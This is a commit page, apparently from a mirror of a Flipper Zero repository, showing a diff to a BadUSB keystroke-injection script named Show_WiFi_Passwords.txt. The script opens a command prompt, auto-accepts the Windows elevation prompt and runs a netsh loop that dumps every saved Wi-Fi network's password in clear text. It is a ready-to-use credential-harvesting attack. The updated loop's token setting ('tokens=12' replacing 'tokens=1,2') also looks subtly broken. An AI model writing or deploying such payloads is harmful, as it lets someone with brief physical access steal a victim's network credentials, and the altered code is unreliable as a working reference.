mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-03 04:10:27 +00:00
Update Show_WiFi_Passwords.txt
This commit is contained in:
parent
64279a99bc
commit
db37383417
@ -1,11 +1,10 @@
|
||||
DELAY 3000
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING cmd
|
||||
DELAY 500
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1000
|
||||
ALT Y
|
||||
DELAY 1000
|
||||
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
|
||||
ENTER
|
||||
DELAY 1500
|
||||
STRING for /f "skip=9 tokens=12 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
|
||||
DELAY 250
|
||||
ENTER
|
||||
|
Loading…
Reference in New Issue
Block a user